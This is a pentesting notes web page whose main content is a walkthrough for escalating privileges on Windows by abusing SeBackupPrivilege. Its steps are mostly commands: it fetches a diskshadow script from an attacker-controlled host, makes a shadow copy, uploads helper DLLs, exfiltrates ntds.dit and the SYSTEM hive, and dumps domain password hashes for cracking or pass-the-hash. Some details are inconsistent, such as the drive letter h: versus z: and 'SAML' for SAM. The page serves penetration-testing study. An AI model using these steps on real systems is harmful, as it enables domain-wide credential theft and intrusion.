Exploit Notes
Exploit Notes

Exploits related to Windows

Active Directory

AD CS (Active Directory Certificate Services) Pentesting
AS-REP Roasting
Active Directory Pentesting
BloodHound SharpHound for Active Directory
Kerberos Pentesting
LAPS (Local Administrator Password Solution) Pentesting
LDAP (Lightweight Directory Access Protocol) Pentesting
NTLM (New Technology LAN Manager) Pentesting
Netlogon Elavasion of Privilege
SMB (Server Message Block) Pentesting

Protocol

MSRPC (Microsoft Remote Procedure Call) Pentesting
RDP (Remote Desktop Protocol) Pentesting
WinRM (Windows Remote Management) Pentesting

Privilege Escalation

Iperius Backup Service Privilege Escalation
Mimikatz
UAC Windows Privilege Escalation
Windows PrivEsc with Registry Keys
Windows PrivEsc with SeBackupPrivilege
Windows PrivEsc with Unquoted Service Path
Windows Privilege Escalation

Post Exploitation

Windows Pivoting

PowerShell

PowerShell
PowerView

Others

Dumping Windows Password Hashes
LocalPotato
Microsoft Outlook Message (.msg)
Microsoft Word Pentesting
Windows API
Windows Basic Features
Windows Disk Management
Windows Forensics
Windows Pivoting
Windows Print Spooler Service
Windows Remote Code Execution from Linux
Windows XML EventLog (EVTX)

Windows PrivEsc with SeBackupPrivilege

Last modified: 2023-02-08

Privilege Escalation Windows

SeBackupPrivilege allows users to retrieve file contents.

Investigation

First check if the current user has SeBackupPrivilege in the privilege information.

whoami /all

If so, we can read any file on the system includes SAML file, SYSTEM registry file.


Exploitation

1. Create a Payload

Create “diskshadow.txt” in local machine. It referes to this.

set metadata C:\tmp\tmp.cabs 
set context persistent nowriters 
add volume c: alias someAlias 
create 
expose %someAlias% h:

Then transfer the file into the target machine.

Before that, create “tmp” folder in root in target machine.

mkdir \tmp
cd \tmp

For example, in target machine,

# [Option 1] PowerShell (we need to start web server in local machine)
PS> Invoke-WebRequest -Uri http://10.0.0.1:8000/diskshadow.txt -OutFile .\diskshadow.txt

# [Option 2] In evil-winrm
PS> upload diskshadow.txt

2. Execute DiskShadow.Exe

Then execute diskshadow.exe.

# /s: Specify the script file
diskshadow.exe /s .\diskshadow.txt

3. Upload Malicious DLL

We can download two dll files from here.

# In evil-winrm
PS> upload SeBackupPrivilegeUtils.dll
PS> upload SeBackupPrivilegeCmdLets.dll
PS> Import-Module .\SeBackupPrivilegeUtils.dll
PS> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS> Copy-FileSeBackupPrivilege z:\windows\ntds\ntds.dit c:\tmp\ntds.dit -overwrite
PS> reg save HKLM\SYSTEM c:\tmp\system
PS> download ntds.dit
PS> download system

4. Dump Password Hashes

Now we have two files (ntds.dit and system) in local machine.
We can dump password hashes using the files.

impacket-secretsdump -ntds ntds.dit -system system LOCAL

After that, crack the hashes or use them for pass-the-hash.

Twitter GitHub

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.